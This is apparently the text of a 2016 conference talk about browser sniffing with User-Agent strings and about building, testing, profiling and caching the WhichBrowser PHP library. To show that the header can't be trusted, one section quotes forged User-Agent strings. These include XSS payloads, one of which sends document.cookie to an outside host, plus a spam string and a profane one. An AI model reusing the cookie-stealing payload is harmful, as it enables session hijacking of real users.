Everybody lies

PHP.FRL, August 23rd 2016

1 Browser sniffing explained

why a talk about browser sniffing?

browser sniffing is dirty

you should use feature detection

why a talk about browser sniffing?

what is browser sniffing?

The HTTP specification defines the User-Agent header. It contains a string with information about the browser.

Every request the browser makes to the server includes the User-Agent header

    GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

And the server's response:

    HTTP/1.1 200 OK
    Date: Mon, 08 Feb 2016 10:40:28 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
    Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
    ETag: "984-50cae11796432"
    Accept-Ranges: bytes
    Content-Length: 2436
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

    <!doctype html>
    <html>

You can use the User-Agent string to identify the browser, the rendering engine, the operating system, the device model, and more
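In PHP the header arrives in the `$_SERVER` superglobal. A minimal sketch of reading it safely (the helper name `rawUserAgent` is made up for this example, and the return type declaration assumes PHP 7):

```php
<?php
// Hypothetical helper: returns the raw User-Agent header,
// or an empty string when the client did not send one.
function rawUserAgent(array $server): string
{
    return isset($server['HTTP_USER_AGENT']) ? (string) $server['HTTP_USER_AGENT'] : '';
}

// On the command line there is no request, so this is simply ''.
$ua = rawUserAgent($_SERVER);
```

Everything after this point is about what that one string does, and does not, tell you.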

what is browser sniffing good for?

improve UX: if you know the platform or browser, you can streamline the user experience

analytics: if you know your users, you can build a better site for them

error logging: if you know which browser is causing problems, you can fix them

why is browser sniffing hard?

things started out simple

Mosaic
    Mosaic/0.9
"Mosaic" is the name of the browser, "0.9" the version of the browser.

Netscape Navigator
    Mozilla/1.0 (Win3.1)
"Mozilla" is the code name of the browser, "1.0" the version of the browser, "Win3.1" the operating system.

but it quickly started to get complicated

Internet Explorer
    Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
"MSIE 1.0" gives the name and the version of the browser, "Windows 95" the operating system. "Mozilla/1.0 (compatible" means: compatible with Netscape Navigator 1.0.

Opera
    Opera/8.54 (Windows 95; U; en)
"Opera" is the name of the browser, "8.54" the version of the browser, "Windows 95" the operating system, "U" United States level encryption, "en" the English language.

Opera
    Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
"Opera" is the name of the browser, "10.00" the version of the browser, "Presto/2.2.0" the rendering engine.

Opera
    Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10
"Opera" is the name of the browser, "9.8" a fake version of the browser, "Version/10.10" the real version of the browser.

Firefox
    Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5
"Gecko" is the name of the rendering engine, "20090624" the build date of the rendering engine, "Firefox" the name of the browser, "3.5" the version of the browser, "rv:1.9.1" the version of the rendering engine.

Firefox
    Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0
The build date ("20100101") is no longer updated.

Firefox
    Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

and it gets worse…

Safari
    Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3
"Safari" is the name of the browser, "Version/3.2.3" the version of the browser.

Chrome
    Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3
"Chrome" is the name of the browser, "15.0.874.120" the version of the browser.

Opera
    Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
"OPR" is the name of the browser, "31.0.1889.180" the version of the browser.

Internet Explorer
    Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
"rv:11.0" is the version of the browser.

Edge
    Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
"Edge" is the name of the browser, "12.10162" the version of the browser.

and those were all relatively normal User-Agent strings

“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings

Samsung Internet
    Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
"SAMSUNG GT-I9505" is the Samsung device, "Version/1.5" the version of the browser.

Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

Sometimes browsers include a compatibility mode or a desktop mode, which deliberately changes the User-Agent string

Opera
    Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
"Opera" is the name of the browser, "Linux zbov" the name of the operating system, "Version/11.50" the version of the browser.

Opera Mobile (desktop mode)
    Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
"Opera" is the name of the browser, "zbov" is ROT13-encoded "mobi", "Version/11.50" the version of the browser.
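The ROT13 claim is easy to verify, because PHP ships `str_rot13()`. A small sketch (the function name `looksLikeOperaMobileDesktopMode` is invented for this example and is not part of any library):

```php
<?php
$ua = 'Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50';

// ROT13 is its own inverse, so encoding "mobi" yields the marker to look for.
// Hypothetical check: does the string carry the disguised mobile marker?
function looksLikeOperaMobileDesktopMode(string $ua): bool
{
    return strpos($ua, str_rot13('mobi')) !== false;
}

$isDisguisedMobile = looksLikeOperaMobileDesktopMode($ua);
```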

Internet Explorer
    Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
"MSIE 8.0" is the browser version.

Internet Explorer (compatibility view)
    Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
"Trident/5.0" means it's Internet Explorer 9.
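One way to see through compatibility view is to trust the Trident token over the MSIE token. The sketch below is illustrative only: the constant and function names are made up, the mapping covers Trident 4.0 through 7.0 (Internet Explorer 8 through 11), and the nullable return type assumes PHP 7.1 or later.

```php
<?php
// Trident (engine) version => the Internet Explorer version it shipped with.
const TRIDENT_TO_IE = [
    '4.0' => '8.0',
    '5.0' => '9.0',
    '6.0' => '10.0',
    '7.0' => '11.0',
];

// Returns the IE version implied by the Trident token, or null if there is none.
function realInternetExplorerVersion(string $ua): ?string
{
    if (!preg_match('/Trident\/([0-9]+\.[0-9]+)/', $ua, $m)) {
        return null;
    }
    return TRIDENT_TO_IE[$m[1]] ?? null;
}

// The string claims MSIE 8.0, but Trident/5.0 gives Internet Explorer 9 away.
$version = realInternetExplorerVersion(
    'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)'
);
```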

Sometimes browsers are just weird

    Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2
    Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

Vehicle Center Console
    Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0

Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1

Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)

Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1

Mozilla/4.0 (PSP (PlayStation Portable); 2.60)

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2

Opera Bork-edition?
    Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

BORK BORK BORK

And it is possible to change the User-Agent string yourself

spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

XSS attacks

    <script>alert("My Little Pony");</script>
    <script language="JavaScript">document.location="http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script>
    <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony">
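These strings only do harm when they are echoed back unescaped, for example in an analytics dashboard or an error log viewer. A minimal sketch of the usual defence, assuming the output context is HTML (the helper name `escapeUserAgent` is made up):

```php
<?php
// Treat the header as untrusted input: escape it before it reaches HTML.
function escapeUserAgent(string $ua): string
{
    return htmlspecialchars($ua, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$safe = escapeUserAgent('<script>alert("My Little Pony");</script>');
echo $safe, PHP_EOL;
// prints: &lt;script&gt;alert(&quot;My Little Pony&quot;);&lt;/script&gt;
```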


funny people
    Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
    Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°


angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.

User-Agent strings cannot be trusted!

Everybody lies

you should never use browser sniffing for controlling access to your website

you should never use browser sniffing for determining browser capabilities

you should never build your own browser sniffing library

2 Creating my own browser sniffing library

open source

PHP 5.4 and up including PHP 7 and HHVM

12,500 lines of code

100% code coverage

5000+ individual tests

device database with 36,000 entries

PSR-1 and PSR-2 coding style

PSR-4 autoloading

PSR-6 caching interface

1 How to maintain quality?

testing of course!

What tools do we use?

PHP_CodeSniffer: checks whether your code follows coding standards

PHPUnit: very good for testing the code that defines the public APIs

PHPUnit: but not so good for testing the actual browser detection

Testrunner: a very lean framework for testing browser sniffing

Testrunner: YAML files that contain a list of user agent strings and the expected results

Testrunner: no coding required. Just add a new user agent string and automatically generate the expected results
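The idea of a data-driven runner can be sketched in a few lines. This is not the actual Testrunner: a plain PHP array stands in for the YAML files, and `$parse` is a toy stand-in for the real parser, so every name below is an assumption made for illustration.

```php
<?php
// Each case pairs a User-Agent string with the expected result.
// A plain array stands in for the YAML fixture files here.
$cases = [
    ['ua' => 'Mosaic/0.9', 'expected' => 'Mosaic 0.9'],
    ['ua' => 'Opera/8.54 (Windows 95; U; en)', 'expected' => 'Opera 8.54'],
];

// Toy stand-in for the real parser: "Name/Version ..." becomes "Name Version".
$parse = function (string $ua): string {
    return preg_match('/^([A-Za-z]+)\/([0-9.]+)/', $ua, $m) ? "$m[1] $m[2]" : 'unknown';
};

// Runs every case and returns the User-Agent strings whose result differs.
function runCases(array $cases, callable $parse): array
{
    $failures = [];
    foreach ($cases as $case) {
        if ($parse($case['ua']) !== $case['expected']) {
            $failures[] = $case['ua'];
        }
    }
    return $failures;
}

$failures = runCases($cases, $parse);
```

Adding a test is then a matter of adding a data entry, which is what makes the "no coding required" workflow possible.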

Continuous integration?

Yes, please!

Automatically start up virtual machines that run your whole test suite after every commit

Automatic testing of your code in multiple versions of PHP

Automatic checking of pull requests with feedback directly in GitHub

.travis.yml

    language: php

    php:
      - 5.4
      - 5.5
      - 5.6
      - 7.0
      - hhvm

    before_script:
      - composer self-update
      - composer update --ignore-platform-reqs --prefer-source

    script:
      - vendor/bin/phpcs --standard=PSR1,PSR2 -n src
      - php bin/runner.php --coverage --show check
      - vendor/bin/phpunit --coverage-clover phpunit.xml

    after_script:
      - travis_retry php vendor/bin/coveralls -v

Check if your tests cover all of your source code

Coverage information is generated by PHPUnit and Testrunner

Generating code coverage

Requires Xdebug or phpdbg

Common format is Clover XML

PHPUnit supports generating coverage as Clover XML

    phpunit --coverage-clover phpunit.xml

For testrunner we need to convert raw Xdebug or phpdbg coverage data to Clover XML

There is a package for that! phpunit/php-code-coverage

    composer require phpunit/php-code-coverage

    $coverage = new PHP_CodeCoverage;
    $coverage->filter()->addDirectoryToWhitelist('src');
    $coverage->start('Testrunner');

    // run your tests

    $coverage->stop();

    $writer = new PHP_CodeCoverage_Report_Clover;
    $writer->process($coverage, 'runner.xml');

2 How to make it faster!

profiling of course!

WhichBrowser used to be 4 times slower than its competitors

[Chart: average parsing time (ms) for UA Parser, Piwik, WhichBrowser, WURFL and Browscap. Source: http://thadafinser.github.io/UserAgentParserComparison/]

Why?

Use Xdebug and QCacheGrind

Xdebug has an option to create performance profiles

    zend_extension="/usr/local/opt/php70-xdebug/xdebug.so"
    xdebug.profiler_enable=1

View performance profiles in QCacheGrind

65% of the time was spent in DeviceModels::identify()

65% of the time was spent looking through the device database

65% of the time was spent iterating over huge arrays

    DeviceModels::$ANDROID_MODELS = [
        …
        'GT-I92(20|28)!'       => [ 'Samsung', 'Galaxy Note' ],
        'GT-I92(30|35)!'       => [ 'Samsung', 'Galaxy Golden' ],
        'GT-I9250'             => [ 'Samsung', 'Galaxy Nexus' ],
        'GT-I92(60|68)!'       => [ 'Samsung', 'Galaxy Premier' ],
        'GT-I9295'             => [ 'Samsung', 'Galaxy S4 Active' ],
        'GT-I93(00|03|05|08)!' => [ 'Samsung', 'Galaxy S III' ],
        'GT-I93(01)!'          => [ 'Samsung', 'Galaxy S3 Neo' ],
        'GT-I95(00|05|07)!'    => [ 'Samsung', 'Galaxy S4' ],
        'GT-I95(02|08)!'       => [ 'Samsung', 'Galaxy S4 Duos' ],
        'GT-I95(06)!'          => [ 'Samsung', 'Galaxy S4 Advance' ],
        …
    ];

    'GT-I93(00|03|05|08)!'

is turned into the regular expression

    "/^GT-I93(00|03|05|08)/i"

Why not a real database?

Easy editing, easy deployment

Order in the file matters

Why a PHP file?

No need to parse JSON or YAML

The whole database can be cached by the opcode cache

But you do need to iterate over every single item in that array until you have a match
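The linear scan can be sketched as follows. The function names are invented for this example, and it assumes that a key ending in "!" is a regular expression anchored at the start of the model name, while any other key is compared literally. The sample entries are taken from the device list shown earlier.

```php
<?php
$models = [
    'GT-I9250'             => ['Samsung', 'Galaxy Nexus'],
    'GT-I93(00|03|05|08)!' => ['Samsung', 'Galaxy S III'],
    'GT-I95(00|05|07)!'    => ['Samsung', 'Galaxy S4'],
];

// Assumption: a trailing "!" marks a regular expression; the pattern is
// expected not to contain the "/" delimiter.
function matchesModel(string $pattern, string $model): bool
{
    if (substr($pattern, -1) === '!') {
        $regex = '/^' . substr($pattern, 0, -1) . '/i';
        return preg_match($regex, $model) === 1;
    }
    return $pattern === $model;
}

// Walks the whole array in file order until the first entry matches.
function identifyModel(array $models, string $model): ?array
{
    foreach ($models as $pattern => $device) {
        if (matchesModel((string) $pattern, $model)) {
            return $device;
        }
    }
    return null;
}

$device = identifyModel($models, 'GT-I9505');
```

With three entries this is instant. With tens of thousands of entries, a model near the end of the file, or one that is not in the database at all, pays for a comparison against every single key.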

Why not create an index?

You can’t create an index for regular expressions :-(

Or can you?

No, you can’t!

If only we could determine all possible matches for a regular expression…

1 All regular expressions are fixed to the start of the string

2 The shorter the index, the easier it is to find the matching strings

The ideal index length was 2 or 3 characters

We can do that!

    /^GT-I93(00|03|05|08)/i  →  GT

    /^(SHP-)?(SHARP )?SH[0-9]{2,3}/i  →  SH

    /^(MEDION|(MD )?LIFETAB)/i  →  ME, MD, LI

    /^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i  →  LE, ID, K0, K1, K2, K3, K4, K…

    /^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i  →  LE, ID, “complex list”

Can we do this in PHP?

There is a package for that! icomefromthenet/reverse-regex

    composer require icomefromthenet/reverse-regex

    use ReverseRegex\Lexer;

    $lexer = new Lexer($regexp);
    $lexer->moveNext();

    if ($lexer->isNextTokenAny([Lexer::T_LITERAL_CHAR, Lexer::T_LITERAL_NUMERIC])) {
        …
    } else if ($lexer->isNextToken(Lexer::T_CHOICE_BAR)) {
        …
    } else if ($lexer->isNextToken(Lexer::T_GROUP_OPEN)) {
        …
    } else if ($lexer->isNextToken(Lexer::T_GROUP_CLOSE)) {
        …
    }

Generate keys from a regular expression in just 100 lines of code

    DeviceModels::$ANDROID_INDEX = [
        …
        '@HW' => array (
            0 => '(HW-|HUAWEI )?(TIT|TAG)!!',
            1 => '(HW-|HUAWEI |HONOR )?(ATH|CHE|CHM|HN3|H30|H60|HOL|KIW|PE|PLK|SCL)!!',
            2 => '(HW-|HUAWEI )?(CHC|KII)!!',
            3 => '(HW-|HUAWEI )?(ALE|D2|G6|G7|GRA|M100|P2|P6|P7|RIO|SC|Sophia)!!',
            4 => '(Huawei|Ascend|HW-)!!',
            5 => 'HW-01E',
            6 => 'HW-03E',
        ),
        …
    ];

Looking up an Android device (without index)

    1✕       foreach ($data as $item)
    15,000✕  preg_match($item, $model) or $item === $model
    1✕       return $item

Looking up an Android device (with index)

    1✕        $i = $index[substr($model, 0, 2)]
    1✕        foreach ($i as $item)
    1 - 100✕  preg_match($item, $model) or $item === $model
    1✕        return $data[$item]
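A runnable sketch of the indexed lookup, under loud assumptions: all function names are invented, the "XY-1000" entry is a made-up placeholder, and the index builder is deliberately naive. It buckets each pattern under its first two characters, which only works when those characters are literals. Patterns such as "(HW-|HUAWEI )?…" need the real key generation described above, which this sketch does not attempt.

```php
<?php
// Sample data: key => [manufacturer, model]. "XY-1000" is a made-up
// placeholder that gives the index a second bucket.
$data = [
    'GT-I9250'             => ['Samsung', 'Galaxy Nexus'],
    'GT-I93(00|03|05|08)!' => ['Samsung', 'Galaxy S III'],
    'XY-1000'              => ['Example', 'Placeholder'],
];

// Assumption: a trailing "!" marks a regular expression anchored at the start.
function matchesPattern(string $pattern, string $model): bool
{
    if (substr($pattern, -1) === '!') {
        return preg_match('/^' . substr($pattern, 0, -1) . '/i', $model) === 1;
    }
    return $pattern === $model;
}

// Naive index: bucket every pattern under "@" plus its first two characters.
// File order is preserved inside each bucket.
function buildIndex(array $data): array
{
    $index = [];
    foreach (array_keys($data) as $pattern) {
        $key = '@' . strtoupper(substr((string) $pattern, 0, 2));
        $index[$key][] = (string) $pattern;
    }
    return $index;
}

// Only the patterns in the bucket for the model's first two characters are tried.
function lookup(array $data, array $index, string $model): ?array
{
    $key = '@' . strtoupper(substr($model, 0, 2));
    foreach ($index[$key] ?? [] as $pattern) {
        if (matchesPattern($pattern, $model)) {
            return $data[$pattern];
        }
    }
    return null;
}

$index = buildIndex($data);
$device = lookup($data, $index, 'GT-I9305');
```

A model whose prefix has no bucket returns immediately without a single `preg_match()` call, which is where most of the saving comes from.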

[Chart: average parsing time (ms) for UA Parser, Piwik, WhichBrowser, WURFL and Browscap. Source: http://thadafinser.github.io/UserAgentParserComparison/]

But wait…

Again lists of regular expressions, but with no possible way to create an index

Multiple calls to preg_match with simple regular expressions

    if (preg_match('/Nintendo Wii/u', $ua)) { … }
    if (preg_match('/Nintendo Wii ?U/u', $ua)) { … }
    if (preg_match('/PlayStation Vita/u', $ua)) { … }
    if (preg_match('/PlayStation 4/u', $ua)) { … }
    if (preg_match('/Xbox One/u', $ua)) { … }

preg_match is fast

But it has a bit of overhead

Replace multiple calls with a single call to reduce overhead


    if (!preg_match('/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui', $ua)) {
        return;
    }

    if (preg_match('/Nintendo Wii/u', $ua)) { … }
    if (preg_match('/Nintendo Wii ?U/u', $ua)) { … }
    if (preg_match('/PlayStation Vita/u', $ua)) { … }
    if (preg_match('/PlayStation 4/u', $ua)) { … }

We still do the individual checks, but only if the combined check tells us one of them can match
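Put together as a self-contained function, the guard pattern might look like this. The function name and the returned labels are invented for illustration. Because this sketch returns on the first hit, the more specific "Wii U" pattern is tested before "Wii".

```php
<?php
// Returns an illustrative label for a games console, or null when none is recognised.
function detectConsole(string $ua): ?string
{
    // One combined check lets most User-Agent strings leave after a single preg_match().
    if (!preg_match('/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui', $ua)) {
        return null;
    }

    // The individual checks only run for the few strings that passed the guard.
    if (preg_match('/Nintendo Wii ?U/u', $ua)) {
        return 'Wii U';
    }
    if (preg_match('/Nintendo Wii/u', $ua)) {
        return 'Wii';
    }
    if (preg_match('/PlayStation Vita/u', $ua)) {
        return 'PlayStation Vita';
    }
    if (preg_match('/PlayStation 4/u', $ua)) {
        return 'PlayStation 4';
    }
    if (preg_match('/Xbox One/u', $ua)) {
        return 'Xbox One';
    }
    return null;
}

// Sample input for the sketch, not a verified real-world string.
$console = detectConsole('Mozilla/5.0 (PlayStation 4 1.000) AppleWebKit/536.26 (KHTML, like Gecko)');
```

The guard costs one extra `preg_match()` for console traffic, and saves all the individual calls for everything else, which is the overwhelming majority of requests.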

[Chart: average parsing time (ms) for UA Parser, Piwik, WhichBrowser, WURFL and Browscap. Source: http://thadafinser.github.io/UserAgentParserComparison/]

On par with others, but with a massive device database

3 How to make it even faster

3 How to make it even faster-der!

caching of course!

A common use case of WhichBrowser is to call it from every page of your website

Instead of analysing every page view you can do it once and reuse that result
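The principle fits in a few lines. In this sketch a plain array stands in for a real cache backend, the User-Agent string is hashed to form the cache key, and `$analyse` is a placeholder for the expensive parsing step. All of these names are assumptions for illustration, not WhichBrowser's own API.

```php
<?php
// Looks up the result for this User-Agent string, analysing it only on a miss.
function analyseOnce(string $ua, callable $analyse, array &$cache)
{
    $key = md5($ua);
    if (!array_key_exists($key, $cache)) {
        $cache[$key] = $analyse($ua); // the expensive work happens only here
    }
    return $cache[$key];
}

// Placeholder for the real analysis; it counts how often it is invoked.
$calls = 0;
$analyse = function (string $ua) use (&$calls): string {
    $calls++;
    return strtoupper($ua);
};

$cache = [];
$first = analyseOnce('Mosaic/0.9', $analyse, $cache);
$second = analyseOnce('Mosaic/0.9', $analyse, $cache);
// $calls is 1 at this point: the second request was served from the cache.
```

An in-memory array only lives for one request, so in practice the cache has to sit in a shared store that survives between page views.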

Memcached, Redis, XCache, Couchbase, APC, MongoDB, filesystem, Zend Data Cache, WinCache

A universal caching API

PSR-6

Memcached

    // Initialise the Memcached client
    $client = new \Memcached();
    $client->addServer('localhost', 11211);

    // Retrieve our data
    $data = $client->get($id);

    if ($client->getResultCode() === Memcached::RES_NOTFOUND) {
        $data = …
        $client->set($id, $data);
    }

Memcached using a PSR-6 cache adapter

    // Initialise the Memcached client
    $client = new \Memcached();
    $client->addServer('localhost', 11211);

    // Initialise our storage pool
    $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client);

    // Retrieve our data
    $item = $pool->getItem($id);

    if ($item->isHit()) {
        $data = $item->get();
    } else {
        $data = …
        $item->set($data);
        $pool->save($item);
    }

Redis using a PSR-6 cache adapter

    // Initialise the Redis client
    $client = new \Redis();
    $client->connect('localhost', 6379);

    // Initialise our storage pool
    $pool = new \Cache\Adapter\Redis\RedisCachePool($client);

    // Retrieve our data
    $item = $pool->getItem($id);

    if ($item->isHit()) {
        $data = $item->get();
    } else {
        $data = …
        $item->set($data);
        $pool->save($item);
    }

Install adapters for the storage method you want

Set up the storage pool and give it to WhichBrowser

WhichBrowser without caching

    // Analyse the user agent string
    $result = new WhichBrowser\Parser();
    $result->analyse(getallheaders());

    echo $result->toString();

WhichBrowser with Memcached caching

    // Initialise the Memcached client
    $client = new \Memcached();
    $client->addServer('localhost', 11211);

    // Initialise our storage pool
    $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client);

    // Analyse the user agent string
    $result = new WhichBrowser\Parser();
    $result->setCache($pool);
    $result->analyse(getallheaders());

    echo $result->toString();

Just 50 lines of code

1 Test everything!

2 Profile everything!

3 Cache everything!

4 Never, ever create your own browser sniffing library

Thank you!
